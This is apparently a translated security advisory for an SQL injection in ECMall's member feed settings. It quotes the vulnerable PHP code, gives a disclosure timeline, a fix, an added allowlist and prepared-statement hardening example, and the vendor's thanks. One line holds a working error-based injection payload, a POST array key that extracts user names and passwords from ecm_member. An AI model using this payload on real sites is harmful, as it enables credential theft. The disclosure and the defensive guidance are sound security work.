2014-06-18: Details have been sent to the vendor and are awaiting the vendor's handling
2014-06-20: The vendor has confirmed the issue; details are disclosed to the vendor only
2014-06-23: Details opened to third-party security partners
2014-08-14: Details opened to core white hats and domain experts
2014-08-24: Details opened to regular white hats
2014-09-03: Details opened to intern white hats
2014-09-16: Details opened to the public
This should be the last instance of this issue here.
The root cause is the same as in WooYun: Ecmall SQL Injection 2; this time it appears in app/member.app.php:
/**
 * Feed settings
 *
 * @author Garbin
 * @param
 * @return void
 **/
function feed_settings()
{
    if (!IS_POST) {
        /* Current location */
        $this->_curlocal(LANG::get('member_center'), 'index.php?app=member', LANG::get('feed_settings'));
        /* Current member-center menu item */
        $this->_curitem('my_profile');
        /* Current submenu */
        $this->_curmenu('feed_settings');
        $this->_config_seo('title', Lang::get('user_center') . ' - ' . Lang::get('feed_settings'));
        $user_feed_config = $this->visitor->get('feed_config');
        $default_feed_config = Conf::get('default_feed_config');
        $feed_config = !$user_feed_config ? $default_feed_config : unserialize($user_feed_config);
        $buyer_feed_items = array(
            'store_created'   => Lang::get('feed_store_created.name'),
            'order_created'   => Lang::get('feed_order_created.name'),
            'goods_collected' => Lang::get('feed_goods_collected.name'),
            'store_collected' => Lang::get('feed_store_collected.name'),
            'goods_evaluated' => Lang::get('feed_goods_evaluated.name'),
            'groupbuy_joined' => Lang::get('feed_groupbuy_joined.name')
        );
        $seller_feed_items = array(
            'goods_created'    => Lang::get('feed_goods_created.name'),
            'groupbuy_created' => Lang::get('feed_groupbuy_created.name'),
        );
        $feed_items = $buyer_feed_items;
        if ($this->visitor->get('manage_store')) {
            $feed_items = array_merge($feed_items, $seller_feed_items);
        }
        $this->assign('feed_items', $feed_items);
        $this->assign('feed_config', $feed_config);
        $this->display('member.feed_settings.html');
    } else {
        // The problem is the feed_config parameter: the keys of the POSTed array are
        // serialized as-is, with no filtering, and then written to the database
        $feed_settings = serialize($_POST['feed_config']);
        $m_member = &m('member');
        $m_member->edit($this->visitor->get('user_id'), array(
            'feed_config' => $feed_settings,
        ));
        $this->show_message('feed_settings_successfully');
    }
}
POST the following data to http://localhost/ecmall/index.php?app=member&act=feed_settings:
feed_config[1'or (SELECT 1 FROM(SELECT count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))x from information_schema.tables group by x)a)#]=v
Administrator account and password:
Fix: the same as for WooYun: Ecmall SQL Injection 2, filter dangerous characters out of the keys of feed_config.
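As an added example (not ECMall's own code, and not the vendor's actual patch), the following is one way to harden the POST branch of feed_settings() shown above. Rather than stripping individual characters from the keys, it accepts only the feed item names the page lists and writes the result with a prepared statement. The $pdo connection, the save_feed_config() helper and the column names are assumptions for this example; the sample input is constructed.

```php
<?php
// Added example, not part of ECMall. Keeps only keys from a fixed allowlist,
// so an attacker-chosen array key never reaches serialize() or the database.

/**
 * Reduce the submitted feed_config array to allowlisted keys with 1/0 values.
 *
 * @param array $input        the raw $_POST['feed_config'] array
 * @param array $allowed_keys feed item names the current user may set
 * @return array              cleaned key => 1|0 map
 */
function sanitize_feed_config(array $input, array $allowed_keys)
{
    $clean = array();
    foreach ($input as $key => $value) {
        // Strict comparison: the key must be exactly one of the known names.
        // Anything else (including keys carrying quotes or SQL syntax) is dropped.
        if (!in_array((string) $key, $allowed_keys, true)) {
            continue;
        }
        // Each setting is a flag; store a canonical 1/0 instead of raw input.
        $clean[$key] = $value ? 1 : 0;
    }
    return $clean;
}

/**
 * Persist the cleaned config with a prepared statement (assumed PDO connection
 * and table/column names), so the serialized string is bound, never interpolated.
 */
function save_feed_config(PDO $pdo, $user_id, array $feed_config)
{
    $stmt = $pdo->prepare('UPDATE ecm_member SET feed_config = :cfg WHERE user_id = :uid');
    return $stmt->execute(array(
        ':cfg' => serialize($feed_config),
        ':uid' => (int) $user_id,
    ));
}

// Allowlist built the same way the page builds $feed_items: buyer items always,
// seller items only when the user manages a store.
$buyer_keys  = array('store_created', 'order_created', 'goods_collected',
                     'store_collected', 'goods_evaluated', 'groupbuy_joined');
$seller_keys = array('goods_created', 'groupbuy_created');
$manage_store = true; // would come from $this->visitor->get('manage_store')
$allowed = $manage_store ? array_merge($buyer_keys, $seller_keys) : $buyer_keys;

// Constructed sample POST body: one hostile key and two legitimate ones.
$sample_post = array(
    "x' or 1=1#"    => 'v',
    'order_created' => 'on',
    'goods_created' => '',
);

$feed_config = sanitize_feed_config($sample_post, $allowed);
// $feed_config is now array('order_created' => 1, 'goods_created' => 0);
// the hostile key is gone before serialize() is ever called.
if (PHP_SAPI === 'cli') {
    var_export($feed_config);
    echo "\n";
}
```

The allowlist is the important part: the keys here are fixed, known identifiers, so there is no legitimate reason to accept arbitrary strings and then try to escape them. The prepared statement is a second, independent layer that holds even if another code path passes an unfiltered value.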
Severity: Low
Vulnerability Rank: 1
Confirmation time: 2014-06-20 11:39
Thank you very much for your contribution to Shopex information security. This vulnerability has already been fixed in the new version; please update promptly. Many thanks.
None yet